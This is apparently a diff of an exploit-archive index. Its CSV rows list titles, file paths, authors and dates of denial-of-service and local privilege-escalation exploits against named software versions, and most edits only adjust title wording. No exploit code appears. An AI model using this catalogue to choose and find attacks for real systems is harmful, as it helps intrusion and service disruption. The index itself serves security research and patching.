2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,dos,windows,
2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,dos,windows,
2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,dos,windows,
@ -399,7 +399,7 @@ id,file,description,date,author,type,platform,port
2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,dos,bsd,
2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,dos,windows,
2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service",2006-10-16,n00b,dos,windows,
2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",dos,multiple,
2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",dos,multiple,
2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",dos,multiple,
@ -408,7 +408,7 @@ id,file,description,date,author,type,platform,port
2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",dos,bsd,
2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",dos,windows,
2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,dos,windows,
2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,dos,windows,
2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service",2006-10-30,x82,dos,windows,
2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",dos,multiple,
2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",dos,hardware,
2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,dos,windows,
@ -488,7 +488,7 @@ id,file,description,date,author,type,platform,port
3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,dos,windows,
3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,dos,windows,
3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,dos,windows,
3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,dos,osx,
3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service",2007-01-25,MoAB,dos,osx,
3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",dos,windows,
3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",dos,cgi,
3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",dos,windows,
@ -1281,7 +1281,7 @@ id,file,description,date,author,type,platform,port
10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,dos,windows,21
10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",dos,multiple,
10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,dos,hardware,80
10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,dos,php,
10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service",2009-11-27,Eren,dos,php,
10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",dos,php,
10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",dos,windows,21
10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",dos,windows,
@ -1755,7 +1755,7 @@ id,file,description,date,author,type,platform,port
15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",dos,windows,
15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,dos,windows,
15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",dos,windows,
15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,dos,aix,
15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure",2010-10-16,ZoRLu,dos,aix,
15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",dos,windows,
@ -2461,8 +2461,8 @@ id,file,description,date,author,type,platform,port
20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,dos,windows,
20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",dos,hardware,
20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",dos,hardware,
20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,dos,hardware,
20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,dos,hardware,
20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-16,Rootshell,dos,hardware,
20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-17,Rootshell,dos,hardware,
20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",dos,multiple,
43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",dos,windows,
20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,dos,hp-ux,
@ -4369,7 +4369,7 @@ id,file,description,date,author,type,platform,port
34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",dos,linux,
34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",dos,linux,
34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",dos,windows,
34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",dos,windows,
34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-09-05,"Robert Kugler",dos,windows,
34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,dos,aix,
34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,dos,windows,
34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",dos,windows,
@ -6807,7 +6807,7 @@ id,file,description,date,author,type,platform,port
180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,local,linux,
182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,local,linux,
183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,local,linux,
184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,local,linux,
184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation",2000-11-16,Tlabs,local,linux,
186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
@ -6914,7 +6914,7 @@ id,file,description,date,author,type,platform,port
629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple,
657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux,
669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,local,linux,
680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",local,osx,
680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2004-12-08,"Jonathan Bringhurst",local,osx,
684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,local,linux,
694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File",2004-12-16,"Vafa Khoshaein",local,windows,
695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,local,linux,
@ -6942,7 +6942,7 @@ id,file,description,date,author,type,platform,port
791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",local,linux,
792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",local,linux,
793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,local,osx,
795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,local,osx,
795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2005-02-07,0xdeadbabe,local,osx,
796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,local,linux,
798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,local,windows,
803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,local,windows,
@ -6993,7 +6993,7 @@ id,file,description,date,author,type,platform,port
971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",local,windows,
972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris,
973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",local,linux,
974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,local,linux,
1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,local,aix,
1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,local,linux,
@ -7047,7 +7047,7 @@ id,file,description,date,author,type,platform,port
1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,local,windows,
1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,local,windows,
1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,local,linux,
1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,local,linux,
1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow",2006-01-13,Qnix,local,linux,
1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,local,linux,
1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",local,linux,
1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",local,linux,
@ -7377,7 +7377,7 @@ id,file,description,date,author,type,platform,port
7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,
7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",local,windows,
7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,local,windows,
7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,local,windows,
7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-22,Encrypt3d.M!nd,local,windows,
7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,
7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,local,windows,
7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",local,freebsd,
@ -7409,8 +7409,8 @@ id,file,description,date,author,type,platform,port
7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,local,windows,
7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,local,windows,
7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,local,windows,
7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,local,windows,
7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,local,windows,
7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,SimO-s0fT,local,windows,
7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,AlpHaNiX,local,windows,
7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,local,windows,
7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
@ -7520,7 +7520,7 @@ id,file,description,date,author,type,platform,port
8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,local,windows,
8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,local,windows,
8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,local,windows,
8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",local,windows,
8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,"Super Cristal",local,windows,
8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,local,windows,
8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,local,windows,
8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,local,linux,
@ -7573,7 +7573,7 @@ id,file,description,date,author,type,platform,port
9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,local,windows,
9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",local,windows,
40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,local,windows,
9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,local,windows,
9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-27,Dr_IDE,local,windows,
9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,local,windows,
9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,local,windows,
9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,
@ -7754,9 +7754,9 @@ id,file,description,date,author,type,platform,port
10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,local,windows,
10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,local,windows,
10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,local,windows,
10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,local,windows,
10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow",2009-12-29,jacky,local,windows,
10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,local,windows,
10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",local,windows,
10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,
@ -9458,7 +9458,7 @@ id,file,description,date,author,type,platform,port
27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",local,windows,
27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,local,linux,
27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,local,osx,
27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",local,osx,
27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation",2013-08-30,"David Kennedy (ReL1K)",local,osx,
28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,local,windows,
28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,local,windows,
28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,local,linux,
@ -9726,7 +9726,7 @@ id,file,description,date,author,type,platform,port
35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",local,windows,
35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",local,windows,
35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,local,osx,
35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",local,linux,
35472,exploits/linux_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",local,linux_x86-64,
35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",local,osx,
@ -10018,7 +10018,7 @@ id,file,description,date,author,type,platform,port
39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)",2016-05-09,Metasploit,local,multiple,
39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows,
39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows,
39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows,
39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032)",2016-04-25,fdiskyou,local,windows,
39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux,
39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux,
39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,
@ -11134,7 +11134,7 @@ id,file,description,date,author,type,platform,port
48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)",2020-03-30,Hodorsec,local,windows,
48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
@ -11144,7 +11144,7 @@ id,file,description,date,author,type,platform,port
48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86,
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)",2020-04-14,"Andy Bowden",local,windows,
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
@ -11180,7 +11180,7 @@ id,file,description,date,author,type,platform,port
48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass)",2020-06-10,boku,local,windows,
48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
@ -11715,9 +11715,9 @@ id,file,description,date,author,type,platform,port
